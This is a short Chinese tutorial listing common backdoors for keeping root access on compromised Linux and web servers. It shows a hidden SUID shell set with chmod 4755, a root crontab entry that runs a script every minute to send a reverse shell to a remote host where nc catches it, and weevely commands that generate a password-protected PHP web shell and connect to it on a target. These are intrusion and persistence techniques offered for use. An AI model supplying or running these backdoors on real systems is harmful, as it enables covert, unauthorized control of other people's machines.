一些常见后门

linux后门

一、前提：已经是root用户，想留一个后门

suid shell

.woot前面的'.'并不是必须的，只是为了隐藏文件( 在文件名的最前面加上“.”，就可以在任意文件目录下进行隐藏) .

chmod 4755——作用，使所有使用.woot文件的用户都具有文件所有者的权限

此时权限并没有改变，因为bash2 针对 suid有一些护卫的措施. 但这也不是不可破的:

二、Unix Bash 远控后门

先创建/etc/xxxx脚本文件

设置权限 chmod +sx /etc/door

修改一下/etc/crontab让它定时执行

nano /etc/crontab    在 /etc/crontab 文件末加入这一行。代表每 1 分钟执行一次。

*/1 * * * * root /etc/xxxx

最后重启一下 crond 的服务。（不同发行版重启方式不一样，自行查询）

service cron reload

service cron start

然后在 x.x.x.x 的服务器上使用nc 接收 Shell 即可。

三、常见的Web后门

weevely——针对php

生成密码为123的后门文件

weevely generate 123 /root/weevely.php

上传到目标服务器，然后远程连接

weevely <目标URL> <密码>就能成功连接上了